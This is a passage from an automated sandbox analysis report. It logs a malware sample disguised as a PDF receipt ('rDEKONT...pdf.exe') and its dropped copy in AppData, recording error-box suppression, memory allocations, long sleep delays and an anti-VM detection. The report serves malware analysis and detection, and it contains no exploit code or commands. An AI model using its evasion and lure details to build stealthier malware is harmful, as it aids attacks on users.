                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 5830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 6830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 7960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: B850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: C850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: CCE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: DCE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: EFC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: FFC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 10FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 5890000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 6890000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 69C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 79C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: C3B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: C840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 69C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: C840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: FB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 2B40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory allocated: 1130000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599686Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599575Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599467Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599140Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599031Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598593Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598363Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598243Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596970Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596727Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596614Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595608Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594509Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594278Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594160Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594041Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599782
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599047
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598594
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598356
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598110
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597910
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597766
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597652
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597547
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 593954
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7264Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2370Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeWindow / User API: threadDelayed 4332Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeWindow / User API: threadDelayed 5500Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeWindow / User API: threadDelayed 7593
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeWindow / User API: threadDelayed 2229
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599686s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599575s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599467s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -599031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598363s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598243s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -597124s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596970s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596727s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596614s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595608s >= -30000sJump to behavior
